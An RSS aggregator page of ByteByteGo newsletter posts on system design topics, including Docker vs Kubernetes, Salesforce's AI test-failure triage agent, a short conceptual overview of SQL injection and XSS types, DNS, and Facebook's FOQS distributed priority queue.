MoreRSS

site iconByteByteGoModify

System design and interviewing experts, authors of best-selling books, offer newsletters and courses.
Please copy the RSS to your reader, or quickly subscribe to:

Inoreader Feedly Follow Feedbin Local Reader

Rss preview of Blog of ByteByteGo

EP185: Docker vs Kubernetes

2025-10-18 23:30:41

AWS Guide to Cloud Architecture Diagrams (Sponsored)

Enhance visibility into your cloud architecture with expert insights from AWS + Datadog. In this ebook, AWS Solutions Architects Jason Mimick and James Wenzel guide you through best practices for creating professional and impactful diagrams.

Download the ebook


This week’s system design refresher:

  • Rate Limiter System Design: Token Bucket, Leaky Bucket, Scaling (Youtube video)

  • Docker vs Kubernetes

  • Batch vs Stream Processing

  • What are Modular Monoliths?

  • What is the difference between Process and Thread?

  • How AI Agents Chain Tools, Memory, and Reasoning?

  • SPONSOR US


Rate Limiter System Design: Token Bucket, Leaky Bucket, Scaling


Docker vs Kubernetes

Docker is a container platform that lets you package applications with their dependencies and run them on a single machine. Here’s how it works:

  1. Starts with the app code and dependencies written into a Dockerfile.

  2. The build image step creates a portable container image.

  3. A container runtime runs the image directly on the host machine.

  4. Networking connects containers and external services and produces the final running app.

Kubernetes is a container orchestration platform that manages containerized applications across a cluster of machines for scalability and resilience. Here’s how it works:

  1. Starts with the app code and dependencies in a Dockerfile.

  2. The build image is passed to a container runtime supported by Kubernetes.

  3. A master node runs the API server, etcd (key-value store), controller manager, and scheduler to coordinate the cluster.

  4. Worker nodes run the actual containers inside the Pods, managed by Kubelet and kube-proxy for networking.

  5. Produces a running app that is distributed, scalable, and self-healing in nature.

Over to you: Have you used Docker or Kubernetes in your projects?


Batch vs Stream Processing

Data never stops flowing, but how we process it makes all the difference. When building data systems, two main approaches emerge: batch processing and stream processing. Both have their place, depending on whether you need accuracy over time or immediate insights.

Batch Processing: Collects data in chunks and processes it at scheduled intervals, great for reports and historical analysis.

Stream Processing: Processes events continuously in real-time, powering dashboards, alerts, and recommendations.

Batch = high-volume, historical accuracy.
Stream = low-latency, real-time action.

Over to you: Which do you find harder to scale, batch pipelines or real-time streams?


What are Modular Monoliths?

A modular monolith is an architectural pattern that divides an application into independent modules or components. Each of these modules has well-defined boundaries that group related functionalities. Doing so results in better cohesion.

Here are the main characteristics of modular monoliths:

  1. The modules are independent.

  2. Each module provides a specific functionality.

  3. Each module should expose a well-defined interface.

What is the main advantage of modular monoliths?

A monolith clubs all the functionalities into one big deployment unit. This makes monoliths simple to understand.

Microservices distribute the functionalities into separate deployable units. This makes them more scalable.

However, A modular monolith divides the application into modules that are part of the same deployment unit. They combine the simplicity of traditional monolithic applications with the flexibility of microservices.

In other words, you can have the best of both worlds with modular monoliths.

So - have you used modular monoliths to build applications?


Popular interview question: What is the difference between Process and Thread?

Main differences between process and thread:

  • Processes are usually independent, while threads exist as process subsets.

  • Each process has its own memory space. Threads that belong to the same process share the same memory.

  • A process is a heavyweight operation. It takes more time to create and terminate.

  • Context switching is more expensive between processes.

  • Inter-thread communication is faster for threads.


How AI Agents Chain Tools, Memory, and Reasoning?

  1. Reasoning: This is the brain of the AI agent. It receives the user’s goal as a query and uses its reasoning agent (using frameworks like ReAct) to break the goal into a series of smaller, logical steps.

  2. Tools: For each step, the agent selects an appropriate tool. These can be external programs or APIs that it can call upon, such as a web search, a calculator, a code interpreter, or documents.

  3. Memory: This is like the notebook. The agent records the outcome of each tool’s use in its memory. This notebook allows it to learn from results, maintain context over long conversations, and refine its plan based on new findings.

This continuous loop of reasoning, acting with a tool, and remembering the outcomes creates a chain. Finally, when the agent is satisfied that it has fulfilled the user’s query, it responds to the user.

Over to you: Have you used AI agents?


Help us Make ByteByteGo Newsletter Better

TL:DR: Take this 2-minute survey so I can learn more about who you are, what you do, and how I can improve ByteByteGo

Take the ByteByteGo Survey


SPONSOR US

Get your product in front of more than 1,000,000 tech professionals.

Our newsletter puts your products and services directly in front of an audience that matters - hundreds of thousands of engineering leaders and senior engineers - who have influence over significant tech decisions and big purchases.

Space Fills Up Fast - Reserve Today

Ad spots typically sell out about 4 weeks in advance. To ensure your ad reaches this influential audience, reserve your space now by emailing [email protected].

A Guide to Microservices Architecture for Building Scalable Systems

2025-10-16 23:30:29

Microservices architecture is a way of designing software applications as a collection of small, independent services that work together.

Instead of building one large monolithic application that handles everything, developers break the system into separate pieces. Each piece, called a microservice, focuses on a specific function such as payments, inventory, or user management. These services communicate with each other over a network and can be developed, tested, deployed, and scaled independently.

This approach is very different from the traditional monolithic architecture, where all features are bundled into a single application.

While monoliths can be simpler to start with, they become harder to maintain as they grow. Even a small change in one part may require rebuilding and redeploying the entire system. Microservices solve this by allowing teams to work on different services without affecting the rest of the system. They improve scalability, agility, and fault tolerance, which makes them well-suited for modern, large-scale applications.

At the same time, microservices also introduce complexity. Managing many small services requires strong design patterns, supporting infrastructure, and clear best practices.

In this article, we will explore these patterns, the main components of production-ready microservices, and the practices that help organizations succeed with this architecture.

Guiding Principles for Microservices

Read more

How Salesforce Used AI To Reduce Test Failure Resolution Time By 30%

2025-10-14 23:30:28

Your free ticket to P99 CONF is waiting — 60+ engineering talks on all things performance (Sponsored)

P99 CONF is the technical conference for anyone who obsesses over high-performance, low-latency applications. Leading engineers from today’s most impressive gamechangers will be sharing 60+ talks on topics like Rust, Go, Zig, distributed data systems, Kubernetes, and AI/ML.

Sign up to get 30-day access to the complete O’Reilly library & learning platform, free books, and a chance to win 1 of 500 free swag packs!

Join 30K of your peers for an unprecedented opportunity to learn from experts like Chip Huyen (author of the O’Reilly AI Engineering book), Alexey Milovidov (Clickhouse creator/CTO) & Andy Pavlo (CMU professor) and more – for free, from anywhere.

GET YOUR FREE TICKET


Disclaimer: The details in this post have been derived from the details shared online by the Salesforce Engineering Team. All credit for the technical details goes to the Salesforce Engineering Team. The links to the original articles and sources are present in the references section at the end of the post. We’ve attempted to analyze the details and provide our input about them. If you find any inaccuracies or omissions, please leave a comment, and we will do our best to fix them.

Modern software systems run on millions of automated tests every single day. At Salesforce, this testing ecosystem operates at an enormous scale.

The company runs about 6 million tests daily, covering more than 78 billion possible test combinations. Every month, these tests generate around 150,000 failures, and there are more than 27,000 code changelists submitted each day.

Before automation, dealing with these failures was a slow and tiring process. Developers had to spend hours going through error logs, changelists, and internal tracking systems like GUS to figure out what went wrong. Integration failures were especially difficult because any of the 30,000 engineers across the company could be responsible for a given issue. This made it hard to find the root cause and fix the problem quickly.

The result was a growing backlog of unresolved failures, increasing developer frustration, and long delays. On average, it took about seven days to resolve a single test failure. The Salesforce engineering team recognized that this was not sustainable. They needed a faster, more reliable way to handle failures and keep the development process moving smoothly. This challenge set the stage for building an AI-powered solution to remove these bottlenecks.

In this article, we will look at how Salesforce developed such a system and the key takeaways from their journey.


Ship code that breaks less: Sentry AI Code Review (Sponsored)

Catch issues before they merge. Sentry’s AI Code Review inspects pull requests using real error and performance signals from your codebase. It surfaces high-impact bugs, explains root causes, and generates targeted unit tests in separate branches. Currently supports GitHub and GitHub Enterprise. Free while in open beta.

Learn More About AI Code Review


The Goal of the System

Salesforce has a dedicated Platform Quality Engineering team that plays a critical role in the software development process.

This team acts as the final line of defense before any code is released to customers. While individual scrum teams focus on testing their own products in isolation, the Platform Quality Engineering team goes a step further. They run integration tests across multiple products to make sure everything works well together as one unified system.

This focus on integration is important because customers often use several Salesforce products in combination. A product might work perfectly on its own, but when used together with others, unexpected problems can appear. Customers sometimes describe this as the products feeling like they come from different companies. The Platform Quality Engineering team exists to catch these integration bugs early, before they ever reach customers. Fixing bugs after deployment is expensive and time-consuming, so identifying them early is a major priority for Salesforce.

Beyond this core testing role, the team is always looking for ways to automate engineering workflows and make developers more productive. One of the most time-consuming parts of their work was triaging large numbers of test failures.

To address this, the Salesforce engineering team set a clear goal:

  • Reduce the amount of manual time engineers spend diagnosing failures

  • Give developers clear, context-aware recommendations that help them fix issues quickly

  • Build trust in AI tools by avoiding vague or incorrect suggestions that could waste time

To meet these goals, Salesforce built the Test Failure (TF) Triage Agent, an AI-powered system that provides concrete recommendations within seconds of a failure occurring.

The TF Triage Agent is designed to transform what used to be a slow, manual triage process into a fast and reliable automated workflow. This system fits directly into the team’s mission of maintaining high product quality at scale while keeping the development process efficient.

AI and Automation Architecture

To build an AI-powered system that could process millions of test results quickly and accurately, the Salesforce engineering team designed a specialized AI and automation architecture.

This architecture had to work with massive amounts of noisy, unstructured error data while keeping response times under 30 seconds. Achieving this required a combination of intelligent data processing, search techniques, and careful system design.

Here are the main technical components of the architecture:

1 - Semantic Search with FAISS

Salesforce used FAISS (Facebook AI Similarity Search) to create a semantic search index of historical test failures and their resolutions. FAISS is a library that allows very fast similarity searches between data represented as vectors.

Every time a new test failure occurs, the system performs a vector similarity search against this index to find past failures that look similar. This makes it possible to match a new error with previously fixed problems and suggest likely solutions. Using FAISS replaced older methods that relied on SQL databases, which were too slow for real-time lookups at Salesforce’s scale.

2 - Contextual Embeddings and Parsing Pipelines

Error logs and code snippets are often messy and inconsistent. To make them useful for semantic search, the Salesforce engineering team built parsing pipelines that clean and structure the data before it is processed.

Once the data is cleaned, the system generates contextual embeddings, which are mathematical representations that capture the meaning of code snippets and error messages. By embedding both error stacks and historical fixes, the system can compare them in a meaningful way and identify the most probable solutions for a new failure.

3 - Asynchronous and Decoupled Pipelines

The team designed the pipelines to work asynchronously and to be decoupled from the main CI/CD workflows. This means that the AI triage process runs in parallel, without slowing down code integration or testing activities.

This design choice is critical for speed. Instead of making developers wait for the AI system to finish, the pipelines process failures independently and return recommendations quickly, keeping overall latency low.

4 - Hybrid of LLM Reasoning and Semantic Search

The Salesforce engineering team combined semantic search with large language model (LLM) reasoning to get the best of both worlds.

The semantic search step finds the most relevant historical examples, while the LLM then interprets and refines these results to produce clear and specific guidance. This approach ensures that developers receive precise recommendations instead of vague or generic answers. It also helps avoid speculative outputs that can reduce developer trust in AI tools.

Development Approach with Cursor

To build the TF Triage Agent quickly and effectively, the Salesforce engineering team decided to use Cursor, an AI-powered pair programming and code-retrieval tool. This decision played a major role in speeding up development and reducing unnecessary engineering effort.

Normally, building a system like this would have taken several months of manual work. By using Cursor, the Salesforce engineering team was able to complete the project in just four to six weeks. Cursor’s strength lies in its deep integration with the codebase and its ability to provide real-time, contextually relevant code references while engineers are working.

During development, when the team needed to add a new similarity engine to the TF Triage Agent, Cursor made it easy to find existing code patterns that were already implemented elsewhere in the system. This meant engineers did not have to reinvent the wheel for every new component. Instead, they could quickly understand and reuse proven approaches.

Cursor was also valuable when the team faced scaling challenges. Instead of relying on trial and error, engineers could explore multiple architectural options suggested by Cursor and make informed decisions quickly. This ability to iterate fast helped the team build a more reliable and scalable system in a shorter time.

Another key benefit was that Cursor allowed Salesforce engineers to focus their time and energy on the core failure triage logic, which was the most complex and valuable part of the project. Tasks like searching through legacy code or writing repetitive boilerplate were handled much more efficiently with Cursor’s assistance.

Conclusion

By building and deploying the TF Triage Agent, the Salesforce engineering team was able to transform a slow, manual process into a fast and reliable automated workflow.

Some of the key lessons from this project are as follows:

  • By using vector search and embeddings for historical failure data, the system can retrieve the most relevant past solutions quickly and accurately. Adding context-rich prompts and LLM reasoning on top of this improves both the precision of recommendations and the level of trust developers place in the system.

  • The team’s decision to build asynchronous pipelines ensured that triage runs efficiently without blocking critical CI/CD processes. This architectural choice allowed the system to scale smoothly even as it processed millions of tests every day.

  • Another key factor was the use of AI development tools like Cursor, which helped shorten the build cycle from months to just a few weeks.

  • Finally, the Salesforce engineering team approached deployment thoughtfully, using incremental rollout and trust-building through concrete data. This ensured that developers adopted the system with confidence and experienced clear improvements in their daily workflows.

Together, these decisions led to a 30 percent faster test failure resolution time and a significant boost in developer productivity.

Reference:


Help us Make ByteByteGo Newsletter Better

TL:DR: Take this 2-minute survey so I can learn more about who you are, what you do, and how I can improve ByteByteGo

Take the ByteByteGo Survey


SPONSOR US

Get your product in front of more than 1,000,000 tech professionals.

Our newsletter puts your products and services directly in front of an audience that matters - hundreds of thousands of engineering leaders and senior engineers - who have influence over significant tech decisions and big purchases.

Space Fills Up Fast - Reserve Today

Ad spots typically sell out about 4 weeks in advance. To ensure your ad reaches this influential audience, reserve your space now by emailing [email protected].

EP184: API Vs SDK!

2025-10-11 23:30:23

🚀Faster mobile app releases with automated QA (Sponsored)

Manual testing on mobile devices is too slow and too limited. It forces teams to cut releases a week early just to test before submitting them to app stores. And without broad device coverage, issues slip through.

QA Wolf gets engineering teams to 80% automated test coverage in weeks with tests running on real iOS devices and Android emulatorsall in 100% parallel with zero flakes.

  • QA cycles reduced to just 15 minutes

  • Multi-device + gesture interactions are fully supported

  • Reliable test execution with zero flakes

  • Human-verified bug reports

Engineering teams move faster, releases stay on track, and testing happens automatically—so developers can focus on building, not debugging.

Rated 4.8/5 ⭐ on G2

Schedule a demo to learn more


This week’s system design refresher:

  • API Vs SDK!

  • SQL Injection (SQLi)

  • Types of AI Agents

  • 24 Good Resources to Learn Software Architecture in 2025

  • Cross-Site Scripting (XSS) Attacks

  • SPONSOR US


API Vs SDK!

API (Application Programming Interface) and SDK (Software Development Kit) are essential tools in the software development world, but they serve distinct purposes:

API:
An API is a set of rules and protocols that allows different software applications and services to communicate with each other.

  1. It defines how software components should interact.

  2. Facilitates data exchange and functionality access between software components.

  3. Typically consists of endpoints, requests, and responses.

SDK:
An SDK is a comprehensive package of tools, libraries, sample code, and documentation that assists developers in building applications for a particular platform, framework, or hardware.

  1. Offers higher-level abstractions, simplifying development for a specific platform.

  2. Tailored to specific platforms or frameworks, ensuring compatibility and optimal performance on that platform.

  3. Offer access to advanced features and capabilities specific to the platform, which might be otherwise challenging to implement from scratch.

The choice between APIs and SDKs depends on the development goals and requirements of the project.

Over to you:
Which do you find yourself gravitating towards – APIs or SDKs – Every implementation has a unique story to tell. What’s yours?


a16z backed Dex is the #1 AI recruiter for software engineers (Sponsored)

Get perfectly matched for $200k-1m tech jobs in just 15 minutes.

After a quick chat, Dex scans thousands of roles, identifies the most interesting and compatible opportunities, then connects you directly with hiring managers.

He’ll even help you negotiate the compensation you deserve.

No more job boards, no wasting time speaking to endless recruiters.

Get interviewed today for:

  • Top quant hedge funds ($300k - $1.5M)

  • Leading AI Labs ($200k - $600k)

  • Early to Mid career roles at high-growth tech companies ($100k - $300k)

ByteByteGo readers receive a $1000 bonus when they land a job through Dex.

Don’t wait—chat with Dex now, for free.


SQL Injection (SQLi)

SQL Injection is one of the oldest and most dangerous web vulnerabilities. With just a few crafted inputs, attackers can manipulate database queries and gain access to sensitive data.

Basic SQLi (Tautology-based): Attackers inject conditions like 1=1 to bypass authentication and retrieve all records.

In-band SQLi (Union/Error-based): Attackers use UNION SELECT or leverage error messages to extract usernames, passwords, or other sensitive data directly.

Blind SQLi (Boolean-based): No direct output is shown, but attackers infer database information based on whether a page returns results or not.

Blind SQLi (Time-based): Attackers use commands like SLEEP(5) to measure server response delays and extract data incrementally.

Over to you: How do you usually prevent SQLi: prepared statements, ORMs, or something else?


Types of AI Agents

AI agents don’t all think and act in the same way. They range from simple rule-followers to systems that learn and adapt. Each type marks a step forward in how machines perceive, decide, and act.

  1. Simple Reflex Agents: These follow condition–action rules. For example, if the temperature is high, turn on the fan. No memory, no thinking, just instant reaction. They are fast and simple.

  2. Model-based Reflex Agents: These maintain an internal understanding of their environment. They are not just reacting to immediate inputs, they have a model that helps them make sense of what is happening beyond what they can see right now.

  3. Goal-based Agents: Here, the focus shifts to goals. Decisions are made based on whether an action brings the agent closer to its objective.

  4. Utility-based Agents: These go a step further by weighing different outcomes. They choose the action that offers the best overall result, balancing trade-offs along the way.

  5. Learning Agents: These are the most advanced. They improve continuously, using feedback to adapt and perform better over time.

Over to you: Which type of agent do you think is driving most of today’s AI systems?


24 Good Resources to Learn Software Architecture in 2025

The resources can be divided into different types such as:

  1. Software Design Books
    Some books that can help are DDIA, System Design Volume 1 & 2, Clean Architecture, Domain-Driven Design, and Software Architecture: the Hard Parts

  2. Tech Blogs and Newsletters
    Read technical blogs by companies like Netflix, Uber, Meta, and Airbnb. Also, the ByteByteGo newsletter provides insights into software design every week.

  3. YouTube Channels and Architectural Resources
    YouTube channels like MIT Distributed Systems, Goto Conferences, and ByteByteGo can help with software architecture and system design. Azure Architecture Center and AWS Architecture Blog are other important resources.

  4. WhitePapers
    For deeper insights, read whitepapers like Facebook Memcache Scaling, Cassandra, Amazon DynamoDB, Kafka, and Google File System.

  5. Software Career Books
    A Software Architect also needs to develop holistic skills. Books about software career aspects such as Pragmatic Programmer, The Software Architect Elevator, The Software Engineer’s Guidebook, and Philosophy of Software Design can help.

Over to you: Which other resources will you add to the list?


Cross-Site Scripting (XSS) Attacks

A small script can cause big damage. XSS lets attackers inject malicious code into web pages and hijack user sessions, steal cookies, or manipulate the browser.

Reflected XSS: This type of attack happens when someone clicks a malicious link. The payload sits in the URL, gets reflected back in the response, and executes. It’s often used in phishing campaigns because you need to trick someone into clicking.

Stored XSS: The malicious code gets saved in your database, maybe in a comment field or user profile. Then it runs automatically every time someone loads that page.

DOM-based XSS: The payload manipulates the DOM directly in the browser without ever hitting your server. Makes it harder to catch with traditional server-side validation.

Over to you: What is one XSS prevention technique you wish more developers knew about?


Help us Make ByteByteGo Newsletter Better

TL:DR: Take this 2-minute survey so I can learn more about who you are, what you do, and how I can improve ByteByteGo

Take the ByteByteGo Survey


SPONSOR US

Get your product in front of more than 1,000,000 tech professionals.

Our newsletter puts your products and services directly in front of an audience that matters - hundreds of thousands of engineering leaders and senior engineers - who have influence over significant tech decisions and big purchases.

Space Fills Up Fast - Reserve Today

Ad spots typically sell out about 4 weeks in advance. To ensure your ad reaches this influential audience, reserve your space now by emailing [email protected].

Domain Name System: The Internet’s Telephone Directory

2025-10-09 23:31:17

Every time someone opens a browser and visits a website, sends an email, or uses a mobile app, they’re relying on DNS.

This invisible system has processed thousands of requests on their behalf today alone, translating human-friendly names like google.com into the numerical IP addresses that computers actually use to communicate. Without DNS, the modern internet would be unusable.

DNS, or Domain Name System, is often compared to a phone book. Just as a phone book translates names into phone numbers, DNS translates domain names into IP addresses. This analogy captures the basic concept, but DNS is far more sophisticated. Unlike a static phone book, DNS is a massive, distributed, real-time database that handles billions of requests per second globally. It routes traffic across continents, enables load balancing across servers, and provides the foundation for how services find each other on the internet.

The critical nature of DNS became painfully clear in October 2016 when a cyberattack on Dyn, a major DNS provider, knocked out access to Twitter, Netflix, Reddit, and dozens of other major services. The websites themselves were functioning perfectly, but without DNS to translate their names into addresses, users couldn’t reach them. It was like having every street sign in a city suddenly disappear.

In this article, we will look at the journey of a DNS query in detail, the various DNS records, and the role of Anycast in DNS.

Journey of a DNS Query

Read more

How Facebook’s Distributed Priority Queue Handles Trillions of Items

2025-10-08 23:31:24

AI AppGen that understands your business (Sponsored)

AI app builders can scaffold a UI from a prompt. But connecting it to your data, deploying it to your preferred environment, and securing it by default? That’s where most tools break down.

Retool takes you all the way—combining AI app generation with your live data, shared components, and security rules to build full-stack apps you can ship on day one.

Generate apps on top of your data, visually edit in context, and get enterprise-grade RBAC, SSO, and audit logs automatically built in.

Build with AI that knows your enterprise


Disclaimer: The details in this post have been derived from the details shared online by the Facebook/Meta Engineering Team. All credit for the technical details goes to the Facebook/Meta Engineering Team. The links to the original articles and sources are present in the references section at the end of the post. We’ve attempted to analyze the details and provide our input about them. If you find any inaccuracies or omissions, please leave a comment, and we will do our best to fix them.

Modern large-scale systems often need to process enormous volumes of work asynchronously.

For example, a social network like Facebook handles many different kinds of background jobs. Some tasks, such as sending a notification, must happen quickly. Others, like translating a large number of posts into multiple languages, can be delayed or processed in parallel. To manage this variety of workloads efficiently, the Facebook engineering team built a service called Facebook Ordered Queueing Service (FOQS).

FOQS is a fully managed, horizontally scalable, multi-tenant distributed priority queue built on sharded MySQL.

In simpler terms, it is a central system that can reliably store and deliver tasks to many different consumers, while respecting their priorities and timing requirements. It acts as a decoupling layer between services, allowing one service to enqueue work and another to process it later. This design keeps systems more resilient and helps engineers control throughput, retry logic, and ordering without building complex custom queues themselves.

The “distributed” part means FOQS runs on many servers at once, and it automatically divides data across multiple MySQL database shards to handle extremely high volumes of tasks. The “priority queue” part means that items can be assigned different importance levels, so the most critical tasks are delivered first. FOQS also supports delayed delivery, letting engineers schedule work for the future rather than immediately.

FOQS plays a key role in some of Facebook’s largest production workflows:

  • The Async platform uses FOQS to defer non-urgent computation and free up resources for real-time operations.

  • Video encoding systems use it to fan out a single upload into many parallel encoding jobs that need to be processed efficiently.

  • Language translation pipelines rely on it to distribute large amounts of parallelizable, compute-heavy translation tasks.

At Facebook’s scale, these background workflows involve trillions of queue operations per day. In this article, we look at how FOQS is structured, how it processes enqueues and dequeues, and how it maintains reliability.

Core Concepts of FOQS

Before looking at how FOQS works internally, it is important to understand the core building blocks that make up the system. Each of these plays a distinct role in how FOQS organizes and delivers tasks at scale.

Namespace

A namespace is the basic unit of multi-tenancy and capacity management in FOQS. Each team or application that uses FOQS gets its own namespace. This separation ensures that one tenant’s workload does not overwhelm others and allows the system to enforce clear performance and quota guarantees.

Every namespace is mapped to exactly one tier. A tier consists of a fleet of FOQS hosts and a set of MySQL shards. You can think of a tier as a self-contained slice of the FOQS infrastructure. By assigning a namespace to a specific tier, Facebook ensures predictable capacity and isolation between different workloads.

Each namespace is also assigned a guaranteed capacity, measured in enqueues per minute. This is the number of items that can be added to the queue per minute without being throttled. These quotas help protect the underlying storage and prevent sudden spikes in one workload from affecting others.

Overall, this design allows FOQS to support many different teams inside Facebook simultaneously, each with its own usage pattern.

Topic

Within a namespace, work is further organized into topics.

A topic acts as a logical priority queue, identified by a simple string name. Topics are designed to be lightweight and dynamic. A new topic is created automatically when the first item is enqueued to it, and it is automatically cleaned up when it becomes empty. There is no need for manual provisioning or configuration.

To help consumers discover available topics, FOQS provides an API called GetActiveTopics. This returns a list of currently active topics in a namespace, meaning topics that have at least one item waiting to be processed. This feature allows consumers to easily find which queues have pending work, even in systems with a large and changing set of topics.

Dynamic topics make FOQS flexible. For example, a video processing system might create a new topic for each uploaded video to process its encoding tasks in isolation. Once the encoding finishes and the queue is empty, the topic disappears automatically.

Item

The item is the most important unit in FOQS because it represents a single task waiting to be processed. Internally, each item is stored as one row in a MySQL table, which allows FOQS to leverage the reliability and indexing capabilities of MySQL.

Each item contains several fields:

  • Namespace and topic identify which logical queue the item belongs to.

  • Priority is a 32-bit integer where a lower value means higher priority. This determines the order in which items are delivered.

  • Payload contains the actual work data. This is an immutable binary blob, up to around 10 KB in size. For example, it could include information about which video to encode or which translation task to perform.

  • Metadata is a mutable field containing a few hundred bytes. This is often used to store intermediate results, retry counts, or backoff information during the item’s lifecycle.

  • Deliver_after is a timestamp that specifies when the item becomes eligible for dequeue. This enables delayed delivery, which is useful for scheduling tasks in the future or applying backoff policies.

  • Lease_duration defines how long a consumer has to acknowledge or reject (ack/nack) the item after dequeuing it. If this time expires without a response, FOQS applies the namespace’s redelivery policy.

  • TTL (time-to-live) specifies when the item should expire and be removed automatically, even if it has not been processed.

  • FOQS ID is a globally unique identifier that encodes the shard ID and a 64-bit primary key. This ID allows FOQS to quickly locate the item’s shard and ensure correct routing for acknowledgments and retries.

Together, these fields give FOQS the ability to control when items become available, how they are prioritized, how long they live, and how they are tracked reliably in a distributed system. By storing each item as a single MySQL row, FOQS benefits from strong consistency, efficient indexing, and mature operational tools, which are crucial at Facebook’s scale.

Enqueue Path

The enqueue path in FOQS is responsible for adding new items into the queue reliably and efficiently.

Since FOQS processes trillions of enqueue operations per day, this part of the system must be extremely well optimized for write throughput while also being careful not to overload the underlying MySQL shards. Facebook designed the enqueue pipeline to use buffering, batching, and protective mechanisms to maintain stability under heavy load.

When a client wants to add a new task, it sends an Enqueue request to the appropriate FOQS host. Instead of immediately writing this item to the database, the host first places the request into an in-memory buffer. This approach allows FOQS to batch multiple enqueues together for each shard, which is much more efficient than inserting them one by one. As soon as the request is accepted into the buffer, the client receives a promise that the enqueue operation will be processed shortly.

See the diagram below:

In the background, per-shard worker threads continuously drain these buffers. Each shard of the MySQL database has its own set of workers that take the enqueued items from memory and perform insert operations into the shard’s MySQL table. This batching significantly reduces the overhead on MySQL and enables FOQS to sustain massive write rates across many shards simultaneously. Once the database operation is completed, FOQS fulfills the original promise and sends the result back to the client. If the insert was successful, the client receives the FOQS ID of the newly enqueued item, which uniquely identifies its location. If there was an error, the client is informed accordingly.

An important part of this pipeline is FOQS’s circuit breaker logic, which helps protect both the service and the database from cascading failures. The circuit breaker continuously monitors the health of each MySQL shard. If it detects sustained slow queries or a spike in error rates, it temporarily marks that shard as unhealthy. When a shard is marked unhealthy, FOQS stops sending new enqueue requests to it until it recovers. This prevents a situation where a struggling shard receives more and more traffic, making its performance even worse. By backing off from unhealthy shards, FOQS avoids the classic “thundering herd” problem where too many clients keep retrying against a slow or failing component, causing further instability.

This careful combination of buffering, batching, and protective measures allows FOQS to handle extremely high write volumes without overwhelming its storage backend. It ensures that enqueues remain fast and reliable, even during periods of peak activity or partial database failures.

Dequeue Path

Once tasks have been enqueued, FOQS must deliver them to consumers efficiently and in the correct order.

At Facebook’s scale, the dequeue path needs to support extremely high read throughput while respecting task priorities and scheduled delivery times. To achieve this, FOQS uses a clever combination of in-memory indexes, prefetching, and demand-aware buffering. This design allows the system to serve dequeue requests quickly without hitting the MySQL databases for every single read.

Each MySQL shard maintains an in-memory index of items that are ready to be delivered. This index contains the primary keys of items that can be dequeued immediately, sorted first by priority (with lower numbers meaning higher priority) and then by their deliver_after timestamps. By keeping this index in memory, FOQS avoids repeatedly scanning large database tables just to find the next item to deliver. This is critical for maintaining low latency and high throughput when millions of dequeue operations happen every second.

On top of these per-shard indexes, each FOQS host runs a component called the Prefetch Buffer. This buffer continuously performs a k-way merge across the indexes of all shards that the host is responsible for.

For reference, A k-way merge is a standard algorithmic technique used to combine multiple sorted lists into one sorted list efficiently. In this case, it helps FOQS select the overall best items to deliver next, based on their priority and deliver_after time, from many shards at once. As the prefetcher pulls items from the shards, it marks those items as “delivered” in MySQL. This step prevents the same item from being handed out to multiple consumers simultaneously, ensuring correct delivery semantics. The selected items are then stored in the Prefetch Buffer in memory.

When a client issues a Dequeue request, FOQS simply drains items from the Prefetch Buffer instead of going to the database. This makes dequeue operations very fast, since they are served entirely from memory and benefit from the pre-sorted order of the buffer. The Prefetch Buffer is constantly replenished in the background, so there is usually a pool of ready-to-deliver items available at any moment.

The prefetcher is also demand-aware, meaning it adapts its behavior based on actual consumption patterns. FOQS tracks dequeue rates for each topic and uses this information to refill the Prefetch Buffer proportionally to the demand. Topics that are being consumed heavily receive more aggressive prefetching, which keeps them “warm” in memory and ensures that high-traffic topics can sustain their dequeue rates without delay. This adaptive strategy allows FOQS to balance efficiency across a large number of topics with very different workloads.

Once an item is dequeued, its lease period begins. A lease defines how long the consumer has to either acknowledge (ack) or reject (nack) the item. If the lease expires without receiving either response, FOQS applies the namespace’s delivery policy.

There are two possible behaviors:

  • At-least-once delivery: The item is returned to the queue and redelivered later. This ensures no tasks are lost, but consumers must handle potential duplicates.

  • At-most-once delivery: The item is deleted after the lease expires. This avoids duplicates but risks losing tasks if the consumer crashes before processing.

This lease and retry mechanism allows FOQS to handle consumer failures gracefully. If a consumer crashes or becomes unresponsive, FOQS can safely redeliver the work to another consumer (or discard it if at-most-once is chosen).

Ack/Nack Path

Once a consumer finishes processing an item, it must inform FOQS about the result. This is done through acknowledgment (ack) or negative acknowledgment (nack) operations.

Every item in FOQS has a FOQS ID that encodes the shard ID and a unique primary key. When a client wants to acknowledge or reject an item, it uses this shard ID to route the request to the correct FOQS host. This step is crucial because only the host that currently owns the shard can modify the corresponding MySQL rows safely. By routing directly to the right place, FOQS avoids unnecessary network hops and ensures that updates are applied quickly and consistently.

When the FOQS host receives an ack or nack request, it does not immediately write to the database. Instead, it appends the request to an in-memory buffer that is maintained per shard. This buffering is similar to what happens during the enqueue path. By batching multiple ack and nack operations together, FOQS can apply them to the database more efficiently, reducing write overhead and improving overall throughput. See the diagram below:

Worker threads on each shard continuously drain these buffers and apply the necessary changes to the MySQL database:

  • For ack operations, the worker simply deletes the row associated with the item from the shard’s MySQL table. This signals that the task has been successfully completed and permanently removes it from the queue.

  • For nack operations, the worker updates the item’s deliver_after timestamp and metadata fields. This allows the item to be redelivered later after the specified delay. Updating metadata is useful for tracking retry counts, recording partial progress, or implementing backoff strategies before the next attempt.

The ack and nack operations are idempotent, which means they can be retried safely without causing inconsistent states.

For example, if an ack request is sent twice by mistake or due to a network retry, deleting the same row again has no harmful effect. Similarly, applying the same nack update multiple times leads to the same final state. Idempotency is essential in distributed systems, where messages may be delayed, duplicated, or retried because of transient failures.

If an ack or nack operation fails due to a network issue or a host crash, FOQS does not lose track of the item. When the item’s lease expires, FOQS automatically applies the namespace’s redelivery policy. This ensures that unacknowledged work is either retried (for at-least-once delivery) or cleaned up (for at-most-once delivery), maintaining forward progress without requiring manual intervention.

Push vs Pull

One of the key design decisions in FOQS is its use of a pull-based model for delivering work to consumers.

In a pull model, consumers actively request new items when they are ready to process them, rather than the system pushing items to consumers automatically. Facebook chose this approach because it provides better control, flexibility, and scalability across many different types of workloads.

Workloads inside Facebook vary widely. Some require low latency and high throughput, while others involve slower, scheduled processing. A push model would require FOQS to track each consumer’s capacity and flow control in real time to avoid overwhelming slower workers. This becomes complicated and error-prone at Facebook’s scale, where consumers can number in the thousands and have very different performance characteristics.

The pull model simplifies this problem. Each consumer can control its own processing rate by deciding when and how much to dequeue. This prevents bottlenecks caused by overloaded consumers and makes the system more resilient to sudden slowdowns. It also allows consumers to handle regional affinity and load balancing intelligently, since they can choose where to pull work from based on their location and capacity.

However, the main drawback of pull systems is that consumers need a way to discover available work efficiently. FOQS addresses this with its routing layer and topic discovery API, which help consumers find active topics and shards without scanning the entire system.

Operating at Facebook Scale

